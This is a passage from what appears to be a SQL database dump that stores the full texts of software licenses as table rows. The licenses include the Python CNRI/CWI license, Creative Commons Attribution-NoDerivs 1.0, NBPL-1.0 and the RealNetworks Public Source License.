RIGHTS.\n\n5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE\nFOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT\nOF USING, MODIFYING OR DISTRIBUTING PYTHON 1.6b1, OR ANY DERIVATIVE THEREOF,\nEVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n\n6. This License Agreement will automatically terminate upon a material breach\nof its terms and conditions.\n\n7. This License Agreement shall be governed by and interpreted in all respects\nby the law of the State of Virginia, excluding conflict of law provisions.\nNothing in this License Agreement shall be deemed to create any relationship\nof agency, partnership, or joint venture between CNRI and Licensee. This License\nAgreement does not grant permission to use CNRI trademarks or trade name in\na trademark sense to endorse or promote products or services of Licensee,\nor any third party.\n\n8. By clicking on the \"ACCEPT\" button where indicated, or by copying, installing\nor otherwise using Python 1.6b1, Licensee agrees to be bound by the terms\nand conditions of this License Agreement. ACCEPT CWI LICENSE AGREEMENT FOR\nPYTHON 0.9.0 THROUGH 1.2\n\nCopyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam, The Netherlands.\nAll rights reserved.\n\nPermission to use, copy, modify, and distribute this software and its documentation\nfor any purpose and without fee is hereby granted, provided that the above\ncopyright notice appear in all copies and that both that copyright notice\nand this permission notice appear in supporting documentation, and that the\nname of Stichting Mathematisch Centrum or CWI not be used in advertising or\npublicity pertaining to distribution of the software without specific, written\nprior permission.\n\nSTICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS\nSOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS,\nIN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE FOR ANY SPECIAL,\nINDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\nLOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE\nOR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\nPERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(93,'CC-BY-ND-1.0','Creative Commons Attribution-NoDerivs 1.0 CREATIVE COMMONS CORPORATION IS\nNOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS DRAFT\nLICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\nb. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested.\n\nb. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Collective Works, You must keep intact all copyright\nnotices for the Work and give the Original Author credit reasonable to the\nmedium or means You are utilizing by conveying the name (or pseudonym if applicable)\nof the Original Author if supplied; the title of the Work if supplied. Such\ncredit may be implemented in any reasonable manner; provided, however, that\nin the case of a Collective Work, at a minimum such credit will appear where\nany other comparable authorship credit appears and in a manner at least as\nprominent as such other comparable authorship credit.\n\n 5. Representations, Warranties and Disclaimer\n\na. By offering the Work for public release under this License, Licensor represents\nand warrants that, to the best of Licensor\'s knowledge after reasonable inquiry:\n\ni. Licensor has secured all rights in the Work necessary to grant the license\nrights hereunder and to permit the lawful exercise of the rights granted hereunder\nwithout You having any obligation to pay any royalties, compulsory license\nfees, residuals or any other payments;\n\nii. The Work does not infringe the copyright, trademark, publicity rights,\ncommon law rights or any other right of any third party or constitute defamation,\ninvasion of privacy or other tortious injury to any third party.\n\nb. EXCEPT AS EXPRESSLY STATED IN THIS LICENSE OR OTHERWISE AGREED IN WRITING\nOR REQUIRED BY APPLICABLE LAW, THE WORK IS LICENSED ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION,\nANY WARRANTIES REGARDING THE CONTENTS OR ACCURACY OF THE WORK.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nAND EXCEPT FOR DAMAGES ARISING FROM LIABILITY TO A THIRD PARTY RESULTING FROM\nBREACH OF THE WARRANTIES IN SECTION 5, IN NO EVENT WILL LICENSOR BE LIABLE\nTO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE\nOR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN\nIF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Collective Works from You under this License, however, will\nnot have their licenses terminated provided such individuals or entities remain\nin full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will\nsurvive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nc. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\nd. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(94,'Libtool-exception','As a special exception to the GNU General Public License, if you distribute this file as part of a program or library that is built using GNU Libtool, you may include this file under the same distribution terms that you use for the rest of that program.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(95,'zlib-acknowledgement','Copyright (c) 2002-2007 Charlie Poole\n\nCopyright (c) 2002-2004 James W. Newkirk, Michael C. Two, Alexei A. Vorontsov\n\nCopyright (c) 2000-2002 Philip A. Craig\n\nThis software is provided \'as-is\', without any express or implied warranty.\nIn no event will the authors be held liable for any damages arising from the\nuse of this software.\n\nPermission is granted to anyone to use this software for any purpose, including\ncommercial applications, and to alter it and redistribute it freely, subject\nto the following restrictions:\n\n1. The origin of this software must not be misrepresented; you must not claim\nthat you wrote the original software. If you use this software in a product,\nan acknowledgment (see the following) in the product documentation is required.\n\nPortions Copyright (c) 2002-2007 Charlie Poole or Copyright (c) 2002-2004\nJames W. Newkirk, Michael C. Two, Alexei A. Vorontsov or Copyright (c) 2000-2002\nPhilip A. Craig\n\n2. Altered source versions must be plainly marked as such, and must not be\nmisrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source distribution.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(96,'GL2PS','GL2PS LICENSE Version 2, November 2003\n\nCopyright (C) 2003, Christophe Geuzaine\n\nPermission to use, copy, and distribute this software and its documentation\nfor any purpose with or without fee is hereby granted, provided that the copyright\nnotice appear in all copies and that both that copyright notice and this permission\nnotice appear in supporting documentation.\n\nPermission to modify and distribute modified versions of this software is\ngranted, provided that:\n\n 1) the modifications are licensed under the same terms as this software;\n\n2) you make available the source code of any modifications that you distribute,\neither on the same media as you distribute any executable or other form of\nthis software, or via a mechanism generally accepted in the software development\ncommunity for the electronic transfer of data.\n\nThis software is provided \"as is\" without express or implied warranty.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(97,'diffmark','\n\n 1. you can do what you want with it\n\n 2. I refuse any responsibility for the consequences\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(98,'NBPL-1.0','The Net Boolean Public License\n\nVersion 1, 22 August 1998 Copyright 1998, Net Boolean Incorporated, Redwood\nCity, California, USA All Rights Reserved. Note: This license is derived from\nthe \"Artistic License\" as distributed with the Perl Programming Language.\nIts terms are different from those of the \"Artistic License.\"\n\nPREAMBLE\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as uunet.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) accompany any non-standard executables with their corresponding Standard\nVersion executables, giving the non-standard executables non-standard names,\nand clearly documenting the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7. C subroutines supplied by you and linked into this Package in order to\nemulate subroutines and variables of the language defined by this Package\nshall not be considered part of this Package, but are the equivalent of input\nas in Paragraph 6, provided these subroutines do not change the language in\nany way that would cause it to fail the regression tests for the language.\n\n8. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n9. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(99,'RPSL-1.0','RealNetworks Public Source License Version 1.0\n\n(Rev. Date October 28, 2002)\n\n1. General Definitions. This License applies to any program or other work\nwhich RealNetworks, Inc., or any other entity that elects to use this license,\n(\"Licensor\") makes publicly available and which contains a notice placed by\nLicensor identifying such program or work as \"Original Code\" and stating that\nit is subject to the terms of this RealNetworks Public Source License version\n1.0 (or subsequent version thereof) (\"License\"). You are not required to accept\nthis License. However, nothing else grants You permission to use, copy, modify\nor distribute the software or its derivative works. These actions are prohibited\nby law if You do not accept this License. Therefore, by modifying, copying\nor distributing the software (or any work based on the software), You indicate\nyour acceptance of this License to do so, and all its terms and conditions.\nIn addition, you agree to the terms of this License by clicking the Accept\nbutton or downloading the software. As used in this License:\n\n1.1 \"Applicable Patent Rights\" mean: (a) in the case where Licensor is the\ngrantor of rights, claims of patents that (i) are now or hereafter acquired,\nowned by or assigned to Licensor and (ii) are necessarily infringed by using\nor making the Original Code alone and not in combination with other software\nor hardware; and (b) in the case where You are the grantor of rights, claims\nof patents that (i) are now or hereafter acquired, owned by or assigned to\nYou and (ii) are infringed (directly or indirectly) by using or making Your\nModifications, taken alone or in combination with Original Code.\n\n1.2 \"Compatible Source License\" means any one of the licenses listed on Exhibit\nB or at https://www.helixcommunity.org/content/complicense or other licenses\nspecifically identified by Licensor in writing. Notwithstanding any term to\nthe contrary in any Compatible Source License, any code covered by any Compatible\nSource License that is used with Covered Code must be made readily available\nin Source Code format for royalty-free use under the terms of the Compatible\nSource License or this License.\n\n1.3 \"Contributor\" means any person or entity that creates or contributes to\nthe creation of Modifications.\n\n1.4 \"Covered Code\" means the Original Code, Modifications, the combination\nof Original Code and any Modifications, and/or any respective portions thereof.\n\n1.5 \"Deploy\" means to use, sublicense or distribute Covered Code other than\nfor Your internal research and development (R&D) and/or Personal Use, and\nincludes without limitation, any and all internal use or distribution of Covered\nCode within Your business or organization except for R&D use and/or Personal\nUse, as well as direct or indirect sublicensing or distribution of Covered\nCode by You to any third party in any form or manner.\n\n1.6 \"Derivative Work\" means either the Covered Code or any derivative work\nunder United States copyright law, and including any work containing or including\nany portion of the Covered Code or Modifications, either verbatim or with\nmodifications and/or translated into another language. Derivative Work also\nincludes any work which combines any portion of Covered Code or Modifications\nwith code not otherwise governed by the terms of this License.\n\n1.7 \"Externally Deploy\" means to Deploy the Covered Code in any way that may\nbe accessed or used by anyone other than You, used to provide any services\nto anyone other than You, or used in any way to deliver any content to anyone\nother than You, whether the Covered Code is distributed to those parties,\nmade available as an application intended for use over a computer network,\nor used to provide services or otherwise deliver content to anyone other than\nYou.\n\n1.8. \"Interface\" means interfaces, functions, properties, class definitions,\nAPIs, header files, GUIDs, V-Tables, and/or protocols allowing one piece of\nsoftware, firmware or hardware to communicate or interoperate with another\npiece of software, firmware or hardware.\n\n1.9 \"Modifications\" mean any addition to, deletion from, and/or change to,\nthe substance and/or structure of the Original Code, any previous Modifications,\nthe combination of Original Code and any previous Modifications, and/or any\nrespective portions thereof. When code is released as a series of files, a\nModification is: (a) any addition to or deletion from the contents of a file\ncontaining Covered Code; and/or (b) any new file or other representation of\ncomputer program statements that contains any part of Covered Code.\n\n1.10 \"Original Code\" means (a) the Source Code of a program or other work\nas originally made available by Licensor under this License, including the\nSource Code of any updates or upgrades to such programs or works made available\nby Licensor under this License, and that has been expressly identified by\nLicensor as such in the header file(s) of such work; and (b) the object code\ncompiled from such Source Code and originally made available by Licensor under\nthis License.\n\n1.11 \"Personal Use\" means use of Covered Code by an individual solely for\nhis or her personal, private and non-commercial purposes. An individual\'s\nuse of Covered Code in his or her capacity as an officer, employee, member,\nindependent contractor or agent of a corporation, business or organization\n(commercial or non-commercial) does not qualify as Personal Use.\n\n1.12 \"Source Code\" means the human readable form of a program or other work\nthat is suitable for making modifications to it, including all modules it\ncontains, plus any associated interface definition files, scripts used to\ncontrol compilation and installation of an executable (object code).\n\n1.13 \"You\" or \"Your\" means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" or \"Your\" includes any entity\nwhich controls, is controlled by, or is under common control with, You, where\n\"control\" means (a) the power, direct or indirect, to cause the direction\nor management of such entity, whether by contract or otherwise, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n2. Permitted Uses; Conditions & Restrictions. Subject to the terms and conditions\nof this License, Licensor hereby grants You, effective on the date You accept\nthis License (via downloading or using Covered Code or otherwise indicating\nyour acceptance of this License), a worldwide, royalty-free, non-exclusive\ncopyright license, to the extent of Licensor\'s copyrights cover the Original\nCode, to do the following:\n\n2.1 You may reproduce, display, perform, modify and Deploy Covered Code, provided\nthat in each instance:\n\n(a) You must retain and reproduce in all copies of Original Code the copyright\nand other proprietary notices and disclaimers of Licensor as they appear in\nthe Original Code, and keep intact all notices in the Original Code that refer\nto this License;\n\n(b) You must include a copy of this License with every copy of Source Code\nof Covered Code and documentation You distribute, and You may not offer or\nimpose any terms on such Source Code that alter or restrict this License or\nthe recipients\' rights hereunder, except as permitted under Section 6;\n\n(c) You must duplicate, to the extent it does not already exist, the notice\nin Exhibit A in each file of the Source Code of all Your Modifications, and\ncause the modified files to carry prominent notices stating that You changed\nthe files and the date of any change;\n\n(d) You must make Source Code of all Your Externally Deployed Modifications\npublicly available under the terms of this License, including the license\ngrants set forth in Section 3 below, for as long as you Deploy the Covered\nCode or twelve (12) months from the date of initial Deployment, whichever\nis longer. You should preferably distribute the Source Code of Your Deployed\nModifications electronically (e.g. download from a web site); and\n\n(e) if You Deploy Covered Code in object code, executable form only, You must\ninclude a prominent notice, in the code itself as well as in related documentation,\nstating that Source Code of the Covered Code is available under the terms\nof this License with information on how and where to obtain such Source Code.\nYou must also include the Object Code Notice set forth in Exhibit A in the\n\"about\" box or other appropriate place where other copyright notices are placed,\nincluding any packaging materials.\n\n2.2 You expressly acknowledge and agree that although Licensor and each Contributor\ngrants the licenses to their respective portions of the Covered Code set forth\nherein, no assurances are provided by Licensor or any Contributor that the\nCovered Code does not infringe the patent or other intellectual property rights\nof any other entity. Licensor and each Contributor disclaim any liability\nto You for claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, You hereby assume sole responsibility to secure\nany other intellectual property rights needed, if any. For example, if a third\nparty patent license is required to allow You to make, use, sell, import or\noffer for sale the Covered Code, it is Your responsibility to acquire such\nlicense(s).\n\n2.3 Subject to the terms and conditions of this License, Licensor hereby grants\nYou, effective on the date You accept this License (via downloading or using\nCovered Code or otherwise indicating your acceptance of this License), a worldwide,\nroyalty-free, perpetual, non-exclusive patent license under Licensor\'s Applicable\nPatent Rights to make, use, sell, offer for sale and import the Covered Code,\nprovided that in each instance you comply with the terms of this License.\n\n3. Your Grants. In consideration of, and as a condition to, the licenses granted\nto You under this License:\n\n(a) You grant to Licensor and all third parties a non-exclusive, perpetual,\nirrevocable, royalty free license under Your Applicable Patent Rights and\nother intellectual property rights owned or controlled by You, to make, sell,\noffer for sale, use, import, reproduce, display, perform, modify, distribute\nand Deploy Your Modifications of the same scope and extent as Licensor\'s licenses\nunder Sections 2.1 and 2.2; and\n\n(b) You grant to Licensor and its subsidiaries a non-exclusive, worldwide,\nroyalty-free, perpetual and irrevocable license, under Your Applicable Patent\nRights and other intellectual property rights owned or controlled by You,\nto make, use, sell, offer for sale, import, reproduce, display, perform, distribute,\nmodify or have modified (for Licensor and/or its subsidiaries), sublicense\nand distribute Your Modifications, in any form and for any purpose, through\nmultiple tiers of distribution.\n\n(c) You agree not use any information derived from Your use and review of\nthe Covered Code, including but not limited to any algorithms or inventions\nthat may be contained in the Covered Code, for the purpose of asserting any\nof Your patent rights, or assisting a third party to assert any of its patent\nrights, against Licensor or any Contributor.\n\n4. Derivative Works. You may create a Derivative Work by combining Covered\nCode with other code not otherwise governed by the terms of this License and\ndistribute the Derivative Work as an integrated product. In each such instance,\nYou must make sure the requirements of this License are fulfilled for the\nCovered Code or any portion thereof, including all Modifications.\n\n4.1 You must cause any Derivative Work that you distribute, publish or Externally\nDeploy, that in whole or in part contains or is derived from the Covered Code\nor any part thereof, to be licensed as a whole at no charge to all third parties\nunder the terms of this License and no other license except as provided in\nSection 4.2. You also must make Source Code available for the Derivative Work\nunder the same terms as Modifications, described in Sections 2 and 3, above.\n\n4.2 Compatible Source Licenses. Software modules that have been independently\ndeveloped without any use of Covered Code and which contain no portion of\nthe Covered Code, Modifications or other Derivative Works, but are used or\ncombined in any way with the Covered Code or any Derivative Work to form a\nlarger Derivative Work, are exempt from the conditions described in Section\n4.1 but only to the extent that: the software module, including any software\nthat is linked to, integrated with, or part of the same applications as, the\nsoftware module by any method must be wholly subject to one of the Compatible\nSource Licenses. Notwithstanding the foregoing, all Covered Code must be subject\nto the terms of this License. Thus, the entire Derivative Work must be licensed\nunder a combination of the RPSL (for Covered Code) and a Compatible Source\nLicense for any independently developed software modules within the Derivative\nWork. The foregoing requirement applies even if the Compatible Source License\nwould ordinarily allow the software module to link with, or form larger works\nwith, other software that is not subject to the Compatible Source License.\nFor example, although the Mozilla Public License v1.1 allows Mozilla code\nto be combined with proprietary software that is not subject to the MPL, if\nMPL-licensed code is used with Covered Code the MPL-licensed code could not\nbe combined or linked with any code not governed by the MPL. The general intent\nof this section 4.2 is to enable use of Covered Code with applications that\nare wholly subject to an acceptable open source license. You are responsible\nfor determining whether your use of software with Covered Code is allowed\nunder Your license to such software.\n\n4.3 Mere aggregation of another work not based on the Covered Code with the\nCovered Code (or with a work based on the Covered Code) on a volume of a storage\nor distribution medium does not bring the other work under the scope of this\nLicense. If You deliver the Covered Code for combination and/or integration\nwith an application previously provided by You (for example, via automatic\nupdating technology), such combination and/or integration constitutes a Derivative\nWork subject to the terms of this License.\n\n5. Exclusions From License Grant. Nothing in this License shall be deemed\nto grant any rights to trademarks, copyrights, patents, trade secrets or any\nother intellectual property of Licensor or any Contributor except as expressly\nstated herein. No right is granted to the trademarks of Licensor or any Contributor\neven if such marks are included in the Covered Code. Nothing in this License\nshall be interpreted to prohibit Licensor from licensing under different terms\nfrom this License any code that Licensor otherwise would have a right to license.\nModifications, Derivative Works and/or any use or combination of Covered Code\nwith other technology provided by Licensor or third parties may require additional\npatent licenses from Licensor which Licensor may grant in its sole discretion.\nNo patent license is granted separate from the Original Code or combinations\nof the Original Code with other software or hardware.\n\n5.1. Trademarks. This License does not grant any rights to use the trademarks\nor trade names owned by Licensor (\"Licensor Marks\" defined in Exhibit C) or\nto any trademark or trade name belonging to any Contributor. No Licensor Marks\nmay be used to endorse or promote products derived from the Original Code\nother than as permitted by the Licensor Trademark Policy defined in Exhibit\nC.\n\n6. Additional Terms. You may choose to offer, and to charge a fee for, warranty,\nsupport, indemnity or liability obligations and/or other rights consistent\nwith the scope of the license granted herein (\"Additional Terms\") to one or\nmore recipients of Covered Code. However, You may do so only on Your own behalf\nand as Your sole responsibility, and not on behalf of Licensor or any Contributor.\nYou must obtain the recipient\'s agreement that any such Additional Terms are\noffered by You alone, and You hereby agree to indemnify, defend and hold Licensor\nand every Contributor harmless for any liability incurred by or claims asserted\nagainst Licensor or such Contributor by reason of any such Additional Terms.\n\n7. Versions of the License. Licensor may publish revised and/or new versions\nof this License from time to time. Each version will be given a distinguishing\nversion number. Once Original Code has been published under a particular version\nof this License, You may continue to use it under the terms of that version.\nYou may also choose to use such Original Code under the terms of any subsequent\nversion of this License published by Licensor. No one other than Licensor\nhas the right to modify the terms applicable to Covered Code created under\nthis License.\n\n8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in part\npre-release, untested, or not fully tested works. The Covered Code may contain\nerrors that could cause failures or loss of data, and may be incomplete or\ncontain inaccuracies. You expressly acknowledge and agree that use of the\nCovered Code, or any portion thereof, is at Your sole and entire risk. THE\nCOVERED CODE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY, UPGRADES OR SUPPORT\nOF ANY KIND AND LICENSOR AND LICENSOR\'S LICENSOR(S) (COLLECTIVELY REFERRED\nTO AS \"LICENSOR\" FOR THE PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS\nEXPRESSLY DISCLAIM ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF MERCHANTABILITY,\nOF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR PURPOSE, OF ACCURACY,\nOF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. LICENSOR AND\nEACH CONTRIBUTOR DOES NOT WARRANT AGAINST INTERFERENCE WITH YOUR ENJOYMENT\nOF THE COVERED CODE, THAT THE FUNCTIONS CONTAINED IN THE COVERED CODE WILL\nMEET YOUR REQUIREMENTS, THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED\nOR ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO ORAL\nOR WRITTEN DOCUMENTATION, INFORMATION OR ADVICE GIVEN BY LICENSOR, A LICENSOR\nAUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY. You\nacknowledge that the Covered Code is not intended for use in high risk activities,\nincluding, but not limited to, the design, construction, operation or maintenance\nof nuclear facilities, aircraft navigation, aircraft communication systems,\nor air traffic control machines in which case the failure of the Covered Code\ncould lead to death, personal injury, or severe physical or environmental\ndamage. Licensor disclaims any express or implied warranty of fitness for\nsuch uses.\n\n9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO EVENT\nSHALL LICENSOR 